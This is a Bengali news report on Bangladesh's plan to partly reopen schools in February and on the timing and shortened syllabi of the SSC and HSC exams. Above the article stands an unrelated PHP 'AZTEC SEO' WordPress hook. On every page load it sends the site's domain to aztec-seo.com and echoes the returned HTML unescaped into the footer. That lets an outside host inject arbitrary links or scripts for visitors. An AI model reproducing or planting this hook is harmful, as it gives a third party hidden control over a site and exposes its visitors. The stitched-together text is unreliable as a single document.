/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
চলমান করোনা পরিস্থিতির কথা মাথায় রেখেই আগামী ফেব্রুয়ারি মাস থেকে সীমিত আকারে শিক্ষাপ্রতিষ্ঠান খুলে দেয়ার সিদ্ধান্ত নিয়েছে সরকার।
মঙ্গলবার ভার্চুয়াল এক সংবাদ সম্মেলনে শিক্ষামন্ত্রী দীপু মনি একথা জানান। তিনি বলেন, আগামী বছরের এসএসসি/সমমান এবং এইচএসসি/সমমান পরীক্ষার্থীদের প্রস্তুতির জন্য সীমিত আকারে শিক্ষাপ্রতিষ্ঠান খোলার প্রস্তুতি নেওয়া হয়েছে। শিক্ষার্থীদের ক্লাসরুমে বসিয়ে অসমাপ্ত সিলেবাস শেষ করে একটি প্রস্তুতিমূলক পরীক্ষা নেয়া হবে। যার মাধ্যমে এ দুই স্তরের পরীক্ষার্থীদের পাবলিক পরীক্ষায় অংশগ্রহণের জন্য প্রস্তুত করা হবে।
তিনি আরও বলেন, পরিস্থিতি অনুকূলে থাকলে আগামী বছরের জুনে এসএসসি ও সমমান পরীক্ষা নেয়া হবে। এরপর জুলাই-আগস্টে এইচএসসি পরীক্ষার প্রস্তুতি নেয়া হবে। তবে করোনা পরিস্থিরি কারণে দীর্ঘদিন শিক্ষাপ্রতিষ্ঠান বন্ধ থাকায় আগামী বছরের এসএসসি ও এইচএসসি পরীক্ষার্থীদের সিলেবাস সংক্ষিপ্ত করে দেয়া হবে।
উল্লেখ্য, স্বাভাবিক সময় এসএসসি পরীক্ষা ফেব্রুয়ারিতে এবং এইচএসসি পরীক্ষা এপ্রিলে অনুষ্ঠিত হয়ে থাকে। তবে করোনার পরিস্থির মধ্যে ২০২১ সালের এসএসসি-এইচএসসি পরীক্ষা কবে হবে, তা নিয়ে শিক্ষক-শিক্ষার্থী ও অভিভাবকসহ সংশ্লিষ্টদের মনে প্রশ্ন ছিল। সবশেষ করোনা পরিস্থিতি বিবেচনায় পরীক্ষা পেছানোর বিষয়ে আজ চুড়ান্ত সিদ্ধান্ত দিয়েছেন শিক্ষামন্ত্রী।